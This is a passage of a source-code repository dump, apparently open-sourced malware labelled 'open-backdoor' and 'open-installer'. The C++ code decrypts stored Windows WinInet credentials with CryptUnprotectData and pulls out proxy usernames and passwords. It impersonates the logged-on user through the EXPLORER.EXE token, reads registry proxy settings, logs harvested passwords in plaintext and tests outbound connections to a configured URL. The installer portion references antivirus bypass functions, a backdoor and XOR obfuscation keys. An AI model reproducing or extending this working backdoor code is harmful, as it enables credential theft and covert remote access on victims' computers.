&dwCredCount, &lpCred)) 71 | return FALSE; 72 | 73 | DWORD j = 0; 74 | 75 | if (dwCredCount <= 0) 76 | return FALSE; 77 | 78 | CHAR szPsw[1024]; 79 | CHAR szUser[1024]; 80 | while (1) 81 | { 82 | if (CRED_TYPE_GENERIC == lpCred[j]->Type) 83 | { 84 | if (!_strnicmp(lpCred[j]->TargetName, "Microsoft_WinInet_", strlen("Microsoft_WinInet_"))) 85 | { 86 | DATA_BLOB pDataIn; 87 | DATA_BLOB pDataOut; 88 | 89 | pDataIn.pbData = lpCred[j]->CredentialBlob; 90 | pDataIn.cbData = lpCred[j]->CredentialBlobSize; 91 | 92 | if (TRUE == CryptUnprotectData(&pDataIn, NULL, &pOptionalEntropy, NULL, NULL, 0, &pDataOut)) 93 | { 94 | CHAR szCryptCred[1024]; 95 | sprintf(szCryptCred, "%S", pDataOut.pbData); 96 | 97 | char *lpPsw = strchr(szCryptCred, ':'); 98 | *lpPsw = 0; 99 | 100 | strcpy(szUser, szCryptCred); 101 | strcpy(szPsw, lpPsw + 1); 102 | 103 | if (strstr(lpCred[j]->TargetName, lpszSearchTerm)) 104 | break; 105 | } 106 | } 107 | } 108 | 109 | if (++j >= dwCredCount) 110 | return FALSE; 111 | } 112 | 113 | strcpy(lpszUser, szUser); 114 | strcpy(lpszPsw, szPsw); 115 | 116 | return TRUE; 117 | } 118 | 119 | LPVOID GetURL_CustomProxy(LPCSTR lpszURL, DWORD *lpdwMemLength, LPINTERNET_PROXY_INFO lpProxy, DWORD dwProxySize, const char *lpszUser, const char *lpszPsw) 120 | { 121 | char szHostName[MAX_PATH]; 122 | char szExtraInfo[MAX_PATH]; 123 | char szScheme[MAX_PATH]; 124 | char szUrlPath[MAX_PATH]; 125 | 126 | URL_COMPONENTS UrlComponents = {}; 127 | 128 | UrlComponents.lpszScheme = szScheme; 129 | UrlComponents.dwSchemeLength = MAX_PATH; 130 | UrlComponents.lpszHostName = szHostName; 131 | UrlComponents.dwHostNameLength = MAX_PATH; 132 | UrlComponents.lpszUrlPath = szUrlPath; 133 | UrlComponents.dwUrlPathLength = MAX_PATH; 134 | UrlComponents.lpszExtraInfo = szExtraInfo; 135 | UrlComponents.dwExtraInfoLength = MAX_PATH; 136 | 137 | UrlComponents.dwStructSize = sizeof(URL_COMPONENTS); 138 | 139 | if (NULL == InternetCrackUrl(lpszURL, 0, 0, &UrlComponents)) 140 | return NULL; 141 | 142 | CHAR szHeaders[1024]; 143 | sprintf(szHeaders, 144 | "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n" 145 | "Accept-Language: en-us\r\n" 146 | "Proxy-Connection: Keep-Alive\r\n" 147 | "Pragma: no-cache" 148 | ); 149 | 150 | HINTERNET hInternet = InternetOpen("Mozilla/4.0 (compatible; MSIE 6.0)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); 151 | if (NULL == hInternet) 152 | return NULL; 153 | 154 | InternetSetOption(hInternet, INTERNET_OPTION_PROXY, lpProxy, dwProxySize); 155 | HINTERNET hConnect = InternetConnect(hInternet, UrlComponents.lpszHostName, UrlComponents.nPort, NULL, NULL, INTERNET_SERVICE_HTTP, 0, NULL); 156 | if (NULL == hConnect) 157 | { 158 | InternetCloseHandle(hInternet); 159 | return NULL; 160 | } 161 | 162 | InternetSetOption(hConnect, INTERNET_OPTION_PROXY_USERNAME, (LPVOID)lpszUser, strlen(lpszUser) + 1); 163 | InternetSetOption(hConnect, INTERNET_OPTION_PROXY_PASSWORD, (LPVOID)lpszPsw, strlen(lpszPsw) + 1); 164 | 165 | CHAR szObjectName[MAX_PATH]; 166 | sprintf(szObjectName, "%s%s", UrlComponents.lpszUrlPath, UrlComponents.lpszExtraInfo); 167 | 168 | HINTERNET hRequest = HttpOpenRequest(hConnect, 169 | "GET", 170 | szObjectName, 171 | NULL, 172 | NULL, 173 | NULL, 174 | INTERNET_FLAG_RELOAD | INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_KEEP_CONNECTION, 175 | NULL 176 | ); 177 | if (NULL == hRequest) 178 | { 179 | InternetCloseHandle(hConnect); 180 | InternetCloseHandle(hInternet); 181 | 182 | return NULL; 183 | } 184 | 185 | DWORD dwTimeout = 60000; 186 | InternetSetOption(hRequest, INTERNET_OPTION_CONNECT_TIMEOUT, &dwTimeout, sizeof(DWORD)); 187 | InternetSetOption(hRequest, INTERNET_OPTION_CONTROL_SEND_TIMEOUT, &dwTimeout, sizeof(DWORD)); 188 | InternetSetOption(hRequest, INTERNET_OPTION_RECEIVE_TIMEOUT, &dwTimeout, sizeof(DWORD)); 189 | 190 | BOOL bRet = HttpSendRequest(hRequest, szHeaders, strlen(szHeaders), NULL, 0); 191 | 192 | DWORD dwStatusCode; 193 | DWORD dwBufferLength = sizeof(DWORD); 194 | HttpQueryInfo(hRequest, HTTP_QUERY_FLAG_NUMBER | HTTP_QUERY_STATUS_CODE, &dwStatusCode, &dwBufferLength, 0); 195 | if (FALSE == bRet || 200 != dwStatusCode) 196 | { 197 | InternetCloseHandle(hRequest); 198 | InternetCloseHandle(hConnect); 199 | InternetCloseHandle(hInternet); 200 | 201 | return NULL; 202 | } 203 | 204 | LPVOID lpMem = NULL; 205 | DWORD dwReadSize = 0; 206 | while (1) 207 | { 208 | if (NULL != lpMem) 209 | { 210 | if (HeapSize(GetProcessHeap(), 0, lpMem) - dwReadSize < 0x2000) 211 | { 212 | LPVOID lpNewMem = HeapReAlloc(GetProcessHeap(), 8, lpMem, HeapSize(GetProcessHeap(), 0, lpMem) + 0x2000); 213 | if (NULL == lpNewMem) 214 | break; 215 | 216 | lpMem = lpNewMem; 217 | } 218 | } 219 | else 220 | { 221 | lpMem = HeapAlloc(GetProcessHeap(), 8, 0x2000); 222 | if (NULL == lpMem) 223 | goto END; 224 | } 225 | 226 | DWORD dwRead = 0; 227 | if (FALSE == InternetReadFile(hRequest, ((char *)lpMem) + dwReadSize, 0x2000, &dwRead)) 228 | break; 229 | 230 | if (0 == dwRead) 231 | goto END; 232 | 233 | dwReadSize += dwRead; 234 | *lpdwMemLength = dwReadSize; 235 | } 236 | 237 | HeapFree(GetProcessHeap(), 0, lpMem); 238 | lpMem = NULL; 239 | 240 | END: 241 | InternetCloseHandle(hRequest); 242 | InternetCloseHandle(hConnect); 243 | InternetCloseHandle(hInternet); 244 | 245 | return lpMem; 246 | } 247 | 248 | LPVOID GetURL_NoProxy(LPCSTR lpszURL, DWORD *lpdwMemLength) 249 | { 250 | char szHostName[MAX_PATH]; 251 | char szExtraInfo[MAX_PATH]; 252 | char szScheme[MAX_PATH]; 253 | char szUrlPath[MAX_PATH]; 254 | 255 | URL_COMPONENTS UrlComponents = {}; 256 | 257 | UrlComponents.lpszScheme = szScheme; 258 | UrlComponents.dwSchemeLength = MAX_PATH; 259 | UrlComponents.lpszHostName = szHostName; 260 | UrlComponents.dwHostNameLength = MAX_PATH; 261 | UrlComponents.lpszUrlPath = szUrlPath; 262 | UrlComponents.dwUrlPathLength = MAX_PATH; 263 | UrlComponents.lpszExtraInfo = szExtraInfo; 264 | UrlComponents.dwExtraInfoLength = MAX_PATH; 265 | 266 | UrlComponents.dwStructSize = sizeof(URL_COMPONENTS); 267 | 268 | if (NULL == InternetCrackUrl(lpszURL, 0, 0, &UrlComponents)) 269 | return NULL; 270 | 271 | CHAR szHeaders[1024]; 272 | sprintf(szHeaders, 273 | "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n" 274 | "Accept-Language: en-us\r\n" 275 | "Proxy-Connection: Keep-Alive\r\n" 276 | "Pragma: no-cache" 277 | ); 278 | 279 | HINTERNET hInternet = InternetOpen("Mozilla/4.0 (compatible; MSIE 6.0)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); 280 | if (NULL == hInternet) 281 | return NULL; 282 | 283 | HINTERNET hConnect = InternetConnect(hInternet, UrlComponents.lpszHostName, UrlComponents.nPort, NULL, NULL, INTERNET_SERVICE_HTTP, 0, NULL); 284 | if (NULL == hConnect) 285 | { 286 | InternetCloseHandle(hInternet); 287 | return NULL; 288 | } 289 | 290 | CHAR szObjectName[MAX_PATH]; 291 | sprintf(szObjectName, "%s%s", UrlComponents.lpszUrlPath, UrlComponents.lpszExtraInfo); 292 | 293 | HINTERNET hRequest = HttpOpenRequest(hConnect, 294 | "GET", 295 | szObjectName, 296 | NULL, 297 | NULL, 298 | NULL, 299 | INTERNET_FLAG_RELOAD | INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_KEEP_CONNECTION, 300 | NULL 301 | ); 302 | if (NULL == hRequest) 303 | { 304 | InternetCloseHandle(hConnect); 305 | InternetCloseHandle(hInternet); 306 | 307 | return NULL; 308 | } 309 | 310 | DWORD dwTimeout = 60000; 311 | InternetSetOption(hRequest, INTERNET_OPTION_CONNECT_TIMEOUT, &dwTimeout, sizeof(DWORD)); 312 | InternetSetOption(hRequest, INTERNET_OPTION_CONTROL_SEND_TIMEOUT, &dwTimeout, sizeof(DWORD)); 313 | InternetSetOption(hRequest, INTERNET_OPTION_RECEIVE_TIMEOUT, &dwTimeout, sizeof(DWORD)); 314 | 315 | BOOL bRet = HttpSendRequest(hRequest, szHeaders, strlen(szHeaders), NULL, 0); 316 | 317 | DWORD dwStatusCode; 318 | DWORD dwBufferLength = sizeof(DWORD); 319 | HttpQueryInfo(hRequest, HTTP_QUERY_FLAG_NUMBER | HTTP_QUERY_STATUS_CODE, &dwStatusCode, &dwBufferLength, 0); 320 | if (FALSE == bRet || 200 != dwStatusCode) 321 | { 322 | InternetCloseHandle(hRequest); 323 | InternetCloseHandle(hConnect); 324 | InternetCloseHandle(hInternet); 325 | 326 | return NULL; 327 | } 328 | 329 | LPVOID lpMem = NULL; 330 | DWORD dwReadSize = 0; 331 | while (1) 332 | { 333 | if (NULL != lpMem && HeapSize(GetProcessHeap(), 0, lpMem) - dwReadSize < 0x2000) 334 | { 335 | if (HeapSize(GetProcessHeap(), 0, lpMem) - dwReadSize < 0x2000) 336 | { 337 | LPVOID lpNewMem = HeapReAlloc(GetProcessHeap(), 8, lpMem, HeapSize(GetProcessHeap(), 0, lpMem) + 0x2000); 338 | if (NULL == lpNewMem) 339 | break; 340 | 341 | lpMem = lpNewMem; 342 | } 343 | } 344 | else 345 | { 346 | lpMem = HeapAlloc(GetProcessHeap(), 8, 0x2000); 347 | if (NULL == lpMem) 348 | goto END; 349 | } 350 | 351 | DWORD dwRead = 0; 352 | if (!InternetReadFile(hRequest, ((char *)lpMem) + dwReadSize, 0x2000, &dwRead)) 353 | break; 354 | 355 | if (0 == dwRead) 356 | goto END; 357 | 358 | dwReadSize += dwRead; 359 | *lpdwMemLength = dwReadSize; 360 | } 361 | 362 | HeapFree(GetProcessHeap(), 0, lpMem); 363 | lpMem = NULL; 364 | 365 | END: 366 | InternetCloseHandle(hRequest); 367 | InternetCloseHandle(hConnect); 368 | InternetCloseHandle(hInternet); 369 | 370 | return lpMem; 371 | } 372 | -------------------------------------------------------------------------------- /open-backdoor/connection.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include "connection.hpp" 6 | 7 | #include 8 | #include "StdAfx.hpp" 9 | #include "proxy.hpp" 10 | #include "setup.hpp" 11 | 12 | BOOL TestConnection_NoProxy() 13 | { 14 | DWORD dwBytes = 0; 15 | DWORD dwMaxSize = 260; 16 | 17 | CHAR szUserName[260]; 18 | GetUserName(szUserName, &dwMaxSize); 19 | 20 | LPVOID lpMem = GetURL_NoProxy(g_szTestURL, &dwBytes); 21 | 22 | LOG("\r\nmethod 1:\r\n\r\n"); 23 | LOG("User:"); 24 | LOG(szUserName); 25 | LOG("\r\n\r\n"); 26 | 27 | BOOL bSucces; 28 | if (lpMem) 29 | { 30 | #ifdef TEST_CONNECTION_VERBOSE 31 | std::cout << (char*)lpMem << std::endl; 32 | #endif // TEST_CONNECTION_VERBOSE 33 | 34 | WriteLog(lpMem, dwBytes); 35 | HeapFree(GetProcessHeap(), 0, lpMem); 36 | 37 | bSucces = TRUE; 38 | } 39 | else 40 | { 41 | bSucces = FALSE; 42 | 43 | std::cout << "Method1 Fail!!!!!" << std::endl; 44 | } 45 | 46 | LOG("\r\n\r\n///////////////////////////////////////////////\r\n\r\n"); 47 | 48 | return bSucces; 49 | } 50 | 51 | BOOL sub_1000605B() 52 | { 53 | BOOL bImpersonated = FALSE; 54 | HANDLE TokenHandle; 55 | 56 | if (GetProcessHandle(&TokenHandle, "EXPLORER.EXE")) 57 | bImpersonated = ImpersonateLoggedOnUser(TokenHandle); 58 | 59 | RegDisablePredefinedCache(); 60 | 61 | CHAR szUserName[260]; 62 | DWORD dwSize = 260; 63 | 64 | GetUserName(szUserName, &dwSize); 65 | 66 | sprintf(g_nProxy_IP__TEST, g_szBlank); 67 | sprintf(g_nProxy_PORT__TEST, g_szBlank); 68 | sprintf(g_nProxy_USER__TEST, g_szBlank); 69 | sprintf(g_nProxy_PSW__TEST, g_szBlank); 70 | 71 | CHAR szUser[1024] = {}; 72 | CHAR szPsw[1024] = {}; 73 | 74 | char *lpszPattern; 75 | char *lpszProxyPort; 76 | char *lpszBuf1; 77 | char *lpszBuf2; 78 | 79 | INTERNET_PROXY_INFO lpProxyInfo = {}; 80 | LPINTERNET_PROXY_INFO lppProxyInfo = &lpProxyInfo; 81 | DWORD dwBufferLength = 4096; 82 | 83 | InternetQueryOption(NULL, INTERNET_OPTION_PROXY, &lpProxyInfo, &dwBufferLength); 84 | if (lpProxyInfo.dwAccessType == INTERNET_OPEN_TYPE_PROXY) 85 | { 86 | char lpszProxyIP[1024]; 87 | strcpy(lpszProxyIP, lpProxyInfo.lpszProxy); 88 | 89 | lpszPattern = "http=http://"; 90 | lpszProxyPort = strstr(lpszProxyIP, "http=http://"); 91 | if (NULL == lpszProxyPort) 92 | lpszProxyPort = lpszProxyIP; 93 | 94 | lpszPattern = "http="; 95 | lpszProxyPort = strstr(lpszProxyIP, "http="); 96 | if (NULL == lpszProxyPort) 97 | lpszProxyPort = lpszProxyIP; 98 | 99 | lpszProxyPort += strlen(lpszPattern); 100 | if (NULL == lpszProxyPort) 101 | lpszProxyPort = lpszProxyIP; 102 | 103 | lpszBuf1 = strchr(lpszProxyPort, ';'); 104 | if (NULL != lpszBuf1) 105 | *lpszBuf1 = 0; 106 | 107 | lpszBuf2 = strchr(lpszProxyPort, ' '); 108 | if (NULL != lpszBuf2) 109 | *lpszBuf2 = 0; 110 | 111 | SearchCredentials(lpszProxyPort, szUser, szPsw); 112 | 113 | if (TRUE == bImpersonated) 114 | { 115 | Sleep(10); 116 | RevertToSelf(); 117 | } 118 | 119 | lpszProxyPort = strrchr(lpszProxyIP, ':'); 120 | if (lpszProxyPort) 121 | { 122 | strcpy(g_nProxy_PORT__TEST, lpszProxyPort + 1); 123 | strncpy(g_nProxy_IP__TEST, lpszProxyIP, strlen(lpszProxyIP) - strlen(lpszProxyPort)); 124 | } 125 | else 126 | { 127 | strcpy(g_nProxy_PORT__TEST, g_szBlank); 128 | strncpy(g_nProxy_IP__TEST, lpszProxyIP, strlen(lpszProxyIP)); 129 | } 130 | 131 | sprintf(g_nProxy_USER__TEST, "%s", szUser); 132 | sprintf(g_nProxy_PSW__TEST, "%s", szPsw); 133 | } 134 | else 135 | { 136 | HKEY hKey = NULL; 137 | RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, KEY_EXECUTE, &hKey); 138 | 139 | BOOL bProxyEnabled; 140 | dwSize = 4; 141 | RegQueryValueEx(hKey, "ProxyEnable", 0, 0, (LPBYTE)&bProxyEnabled, &dwSize); 142 | 143 | CHAR szProxyServer[1024] = {}; 144 | dwSize = 1024; 145 | RegQueryValueEx(hKey, "ProxyServer", 0, 0, (LPBYTE)szProxyServer, &dwSize); 146 | 147 | CHAR szProxyOverride[1024] = {}; 148 | dwSize = 1024; 149 | RegQueryValueEx(hKey, "ProxyOverride", 0, 0, (LPBYTE)szProxyOverride, &dwSize); 150 | 151 | RegCloseKey(hKey); 152 | 153 | if (FALSE != bProxyEnabled) 154 | { 155 | char lpszProxyIP[1024]; 156 | 157 | lpProxyInfo.dwAccessType = INTERNET_OPEN_TYPE_PROXY; 158 | lpProxyInfo.lpszProxy = szProxyServer; 159 | lpProxyInfo.lpszProxyBypass = szProxyServer; 160 | 161 | strcpy(lpszProxyIP, szProxyServer); 162 | 163 | lpszPattern = "http=http://"; 164 | lpszProxyPort = strstr(lpszProxyIP, "http=http://"); 165 | if (NULL == lpszProxyPort) 166 | lpszProxyPort = lpszProxyIP; 167 | 168 | lpszPattern = "http="; 169 | lpszProxyPort = strstr(lpszProxyIP, "http="); 170 | if (NULL == lpszProxyPort) 171 | lpszProxyPort = lpszProxyIP; 172 | 173 | lpszProxyPort += strlen(lpszPattern); 174 | if (NULL == lpszProxyPort) 175 | lpszProxyPort = lpszProxyIP; 176 | 177 | lpszBuf1 = strchr(lpszProxyPort, ';'); 178 | if (NULL != lpszBuf1) 179 | *lpszBuf1 = 0; 180 | 181 | lpszBuf2 = strchr(lpszProxyPort, ' '); 182 | if (NULL != lpszBuf2) 183 | *lpszBuf2 = 0; 184 | 185 | SearchCredentials(lpszProxyPort, szUser, szPsw); 186 | 187 | if (TRUE == bImpersonated) 188 | RevertToSelf(); 189 | 190 | lpszProxyPort = strrchr(lpszProxyIP, ':'); 191 | if (lpszProxyPort) 192 | { 193 | strcpy(g_nProxy_PORT__TEST, lpszProxyPort + 1); 194 | strncpy(g_nProxy_IP__TEST, lpszProxyIP, strlen(lpszProxyIP) - strlen(lpszProxyPort)); 195 | } 196 | else 197 | { 198 | strcpy(g_nProxy_PORT__TEST, g_szBlank); 199 | strncpy(g_nProxy_IP__TEST, lpszProxyIP, strlen(lpszProxyIP)); 200 | } 201 | 202 | sprintf(g_nProxy_USER__TEST, "%s", szUser); 203 | sprintf(g_nProxy_PSW__TEST, "%s", szPsw); 204 | } 205 | else 206 | { 207 | lppProxyInfo = NULL; 208 | 209 | if (TRUE == bImpersonated) 210 | RevertToSelf(); 211 | } 212 | } 213 | 214 | DWORD dwGetSize = 0; 215 | LPVOID lpMem = GetURL_CustomProxy(g_szTestURL, 216 | &dwGetSize, 217 | lppProxyInfo, 218 | 12, 219 | g_szBlank, 220 | g_szBlank 221 | ); 222 | 223 | LOG("\r\nmethod 3:\r\n\r\n"); 224 | LOG("User:"); 225 | LOG(szUserName); 226 | LOG("\r\n\r\n"); 227 | LOG("\r\nProxyIP:"); 228 | LOG(g_nProxy_IP__TEST); 229 | LOG("\r\nProxyBypass:"); 230 | LOG(g_nProxy_PORT__TEST); 231 | LOG("\r\nUser:"); 232 | LOG(g_nProxy_USER__TEST); 233 | LOG("\r\nPass:"); 234 | LOG(g_nProxy_PSW__TEST); 235 | LOG("\r\n\r\n"); 236 | 237 | BOOL bSuccess = FALSE; 238 | if (NULL != lpMem) 239 | { 240 | #ifdef TEST_CONNECTION_VERBOSE 241 | std::cout << (char*)lpMem << std::endl; 242 | #endif // TEST_CONNECTION_VERBOSE 243 | 244 | WriteLog(lpMem, dwGetSize); 245 | HeapFree(GetProcessHeap(), 0, lpMem); 246 | 247 | bSuccess = TRUE; 248 | } 249 | else 250 | { 251 | std::cout << "Method3 Fail!!!!!" << std::endl; 252 | } 253 | 254 | LOG("\r\n\r\n///////////////////////////////////////////////\r\n\r\n"); 255 | 256 | return bSuccess; 257 | } 258 | 259 | BOOL sub_10006637() 260 | { 261 | BOOL bImpersonated = FALSE; 262 | HANDLE TokenHandle; 263 | 264 | if (GetProcessHandle(&TokenHandle, "EXPLORER.EXE")) 265 | bImpersonated = ImpersonateLoggedOnUser(TokenHandle); 266 | 267 | RegDisablePredefinedCache(); 268 | 269 | CHAR szUserName[260]; 270 | DWORD dwSize = 260; 271 | 272 | GetUserName(szUserName, &dwSize); 273 | 274 | sprintf(g_nProxy_IP__TEST, g_szBlank); 275 | sprintf(g_nProxy_PORT__TEST, g_szBlank); 276 | sprintf(g_nProxy_USER__TEST, g_szBlank); 277 | sprintf(g_nProxy_PSW__TEST, g_szBlank); 278 | 279 | CHAR szUser[1024] = {}; 280 | CHAR szPsw[1024] = {}; 281 | 282 | char *lpszPattern; 283 | char *lpszProxyPort; 284 | char *lpszBuf1; 285 | char *lpszBuf2; 286 | 287 | INTERNET_PROXY_INFO lpProxyInfo = {}; 288 | LPINTERNET_PROXY_INFO lppProxyInfo = &lpProxyInfo; 289 | DWORD dwBufferLength = 4096; 290 | 291 | InternetQueryOption(NULL, INTERNET_OPTION_PROXY, &lpProxyInfo, &dwBufferLength); 292 | if (lpProxyInfo.dwAccessType == INTERNET_OPEN_TYPE_PROXY) 293 | { 294 | char lpszProxyIP[1024]; 295 | strcpy(lpszProxyIP, lpProxyInfo.lpszProxy); 296 | 297 | lpszPattern = "http=http://"; 298 | lpszProxyPort = strstr(lpszProxyIP, "http=http://"); 299 | if (NULL == lpszProxyPort) 300 | lpszProxyPort = lpszProxyIP; 301 | 302 | lpszPattern = "http="; 303 | lpszProxyPort = strstr(lpszProxyIP, "http="); 304 | if (NULL == lpszProxyPort) 305 | lpszProxyPort = lpszProxyIP; 306 | 307 | lpszProxyPort += strlen(lpszPattern); 308 | if (NULL == lpszProxyPort) 309 | lpszProxyPort = lpszProxyIP; 310 | 311 | lpszBuf1 = strchr(lpszProxyPort, ';'); 312 | if (NULL != lpszBuf1) 313 | *lpszBuf1 = 0; 314 | 315 | lpszBuf2 = strchr(lpszProxyPort, ' '); 316 | if (NULL != lpszBuf2) 317 | *lpszBuf2 = 0; 318 | 319 | SearchCredentials(lpszProxyPort, szUser, szPsw); 320 | 321 | if (TRUE == bImpersonated) 322 | { 323 | Sleep(10); 324 | RevertToSelf(); 325 | } 326 | 327 | lpszProxyPort = strrchr(lpszProxyIP, ':'); 328 | if (lpszProxyPort) 329 | { 330 | strcpy(g_nProxy_PORT__TEST, lpszProxyPort + 1); 331 | strncpy(g_nProxy_IP__TEST, lpszProxyIP, strlen(lpszProxyIP) - strlen(lpszProxyPort)); 332 | } 333 | else 334 | { 335 | strcpy(g_nProxy_PORT__TEST, g_szBlank); 336 | strncpy(g_nProxy_IP__TEST, lpszProxyIP, strlen(lpszProxyIP)); 337 | } 338 | 339 | sprintf(g_nProxy_USER__TEST, "%s", szUser); 340 | sprintf(g_nProxy_PSW__TEST, "%s", szPsw); 341 | } 342 | else 343 | { 344 | HKEY hKey = NULL; 345 | RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, KEY_EXECUTE, &hKey); 346 | 347 | BOOL bProxyEnabled; 348 | dwSize = 4; 349 | RegQueryValueEx(hKey, "ProxyEnable", 0, 0, (LPBYTE)&bProxyEnabled, &dwSize); 350 | 351 | CHAR szProxyServer[1024] = {}; 352 | dwSize = 1024; 353 | RegQueryValueEx(hKey, "ProxyServer", 0, 0, (LPBYTE)szProxyServer, &dwSize); 354 | 355 | CHAR szProxyOverride[1024] = {}; 356 | dwSize = 1024; 357 | RegQueryValueEx(hKey, "ProxyOverride", 0, 0, (LPBYTE)szProxyOverride, &dwSize); 358 | 359 | RegCloseKey(hKey); 360 | 361 | if (FALSE != bProxyEnabled) 362 | { 363 | char lpszProxyIP[1024]; 364 | 365 | lpProxyInfo.dwAccessType = INTERNET_OPEN_TYPE_PROXY; 366 | lpProxyInfo.lpszProxy = szProxyServer; 367 | lpProxyInfo.lpszProxyBypass = szProxyServer; 368 | 369 | strcpy(lpszProxyIP, szProxyServer); 370 | 371 | lpszPattern = "http=http://"; 372 | lpszProxyPort = strstr(lpszProxyIP, "http=http://"); 373 | if (NULL == lpszProxyPort) 374 | lpszProxyPort = lpszProxyIP; 375 | 376 | lpszPattern = "http="; 377 | lpszProxyPort = strstr(lpszProxyIP, "http="); 378 | if (NULL == lpszProxyPort) 379 | lpszProxyPort = lpszProxyIP; 380 | 381 | lpszProxyPort += strlen(lpszPattern); 382 | if (NULL == lpszProxyPort) 383 | lpszProxyPort = lpszProxyIP; 384 | 385 | lpszBuf1 = strchr(lpszProxyPort, ';'); 386 | if (NULL != lpszBuf1) 387 | *lpszBuf1 = 0; 388 | 389 | lpszBuf2 = strchr(lpszProxyPort, ' '); 390 | if (NULL != lpszBuf2) 391 | *lpszBuf2 = 0; 392 | 393 | SearchCredentials(lpszProxyPort, szUser, szPsw); 394 | 395 | if (TRUE == bImpersonated) 396 | RevertToSelf(); 397 | 398 | lpszProxyPort = strrchr(lpszProxyIP, ':'); 399 | if (lpszProxyPort) 400 | { 401 | strcpy(g_nProxy_PORT__TEST, lpszProxyPort + 1); 402 | strncpy(g_nProxy_IP__TEST, lpszProxyIP, strlen(lpszProxyIP) - strlen(lpszProxyPort)); 403 | } 404 | else 405 | { 406 | strcpy(g_nProxy_PORT__TEST, g_szBlank); 407 | strncpy(g_nProxy_IP__TEST, lpszProxyIP, strlen(lpszProxyIP)); 408 | } 409 | 410 | sprintf(g_nProxy_USER__TEST, "%s", szUser); 411 | sprintf(g_nProxy_PSW__TEST, "%s", szPsw); 412 | } 413 | else 414 | { 415 | lppProxyInfo = NULL; 416 | 417 | if (TRUE == bImpersonated) 418 | RevertToSelf(); 419 | } 420 | } 421 | 422 | DWORD dwGetSize = 0; 423 | LPVOID lpMem = GetURL_CustomProxy(g_szTestURL, 424 | &dwGetSize, 425 | lppProxyInfo, 426 | 12, 427 | g_nProxy_USER__TEST, 428 | g_nProxy_PSW__TEST 429 | ); 430 | 431 | LOG("\r\nmethod 4:\r\n\r\n"); 432 | LOG("User:"); 433 | LOG(szUserName); 434 | LOG("\r\n\r\n"); 435 | LOG("\r\nProxyIP:"); 436 | LOG(g_nProxy_IP__TEST); 437 | LOG("\r\nProxyBypass:"); 438 | LOG(g_nProxy_PORT__TEST); 439 | LOG("\r\nUser:"); 440 | LOG(g_nProxy_USER__TEST); 441 | LOG("\r\nPass:"); 442 | LOG(g_nProxy_PSW__TEST); 443 | LOG("\r\n\r\n"); 444 | 445 | BOOL bSuccess = FALSE; 446 | if (NULL != lpMem) 447 | { 448 | #ifdef TEST_CONNECTION_VERBOSE 449 | std::cout << (char*)lpMem << std::endl; 450 | #endif // TEST_CONNECTION_VERBOSE 451 | 452 | WriteLog(lpMem, dwGetSize); 453 | HeapFree(GetProcessHeap(), 0, lpMem); 454 | 455 | bSuccess = TRUE; 456 | } 457 | else 458 | { 459 | std::cout << "Method4 Fail!!!!!" << std::endl; 460 | } 461 | 462 | LOG("\r\n\r\n///////////////////////////////////////////////\r\n\r\n"); 463 | 464 | return bSuccess; 465 | } 466 | 467 | BOOL TestProxyConnection() 468 | { 469 | CHAR szUserName[260]; 470 | DWORD dwSize = 260; 471 | 472 | GetUserName(szUserName, &dwSize); 473 | 474 | Setup_(); 475 | 476 | CHAR szProxy[260]; 477 | CHAR szBypass[260]; 478 | 479 | sprintf(szProxy, "%s:%s", g_nProxy_IP__TEST, g_nProxy_PORT__TEST); 480 | sprintf(szBypass, "%s:%s", g_nProxy_IP__TEST, g_nProxy_PORT__TEST); 481 | 482 | INTERNET_PROXY_INFO lpProxy; 483 | 484 | lpProxy.lpszProxy = szProxy; 485 | lpProxy.lpszProxyBypass = szBypass; 486 | lpProxy.dwAccessType = INTERNET_OPEN_TYPE_PROXY; 487 | 488 | DWORD dwGetSize = 0; 489 | LPVOID lpMem = GetURL_CustomProxy(g_szTestURL, 490 | &dwGetSize, 491 | &lpProxy, 492 | 12, 493 | g_nProxy_USER__TEST, 494 | g_nProxy_PSW__TEST 495 | ); 496 | 497 | LOG("\r\nmethod currect:\r\n\r\n"); 498 | LOG("User:"); 499 | LOG(szUserName); 500 | LOG("\r\n\r\n"); 501 | LOG("\r\nProxyIP:"); 502 | LOG(lpProxy.lpszProxy); 503 | LOG("\r\nProxyBypass:"); 504 | LOG(lpProxy.lpszProxyBypass); 505 | LOG("\r\nUser:"); 506 | LOG(g_nProxy_USER__TEST); 507 | LOG("\r\nPass:"); 508 | LOG(g_nProxy_PSW__TEST); 509 | LOG("\r\n\r\n"); 510 | 511 | BOOL bSuccess = FALSE; 512 | if (NULL != lpMem) 513 | { 514 | #ifdef TEST_CONNECTION_VERBOSE 515 | std::cout << (char*)lpMem << std::endl; 516 | #endif // TEST_CONNECTION_VERBOSE 517 | 518 | WriteLog(lpMem, dwGetSize); 519 | HeapFree(GetProcessHeap(), 0, lpMem); 520 | 521 | bSuccess = TRUE; 522 | } 523 | 524 | LOG("\r\n\r\n///////////////////////////////////////////////\r\n\r\n"); 525 | 526 | return bSuccess; 527 | } 528 | -------------------------------------------------------------------------------- /open-installer/main.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include 6 | #include 7 | 8 | // Functions for AntiVirus bypass 9 | #include "bypass.hpp" 10 | 11 | // Plain backdoor 12 | #include "backdoor.hpp" 13 | 14 | // ======= [BEGIN EASY COSTUMIZATION] ======= 15 | #define CONFIG_FILE_NAME "config_t.dat" 16 | #define BATCH_FILE_NAME "net.bat" 17 | #define INSTALL_MUTEX_NAME " INSTALL SERVICES NOW!" 18 | 19 | #define CRYPTO_STRING_KEY (unsigned char)0x3E 20 | #define CRYPTO_BINARY_KEY {'j', 'w', 'y', '7'} 21 | 22 | #define MAX_BINARY_DATA_LENGTH 200 * 1024 // 200KB 23 | 24 | #define 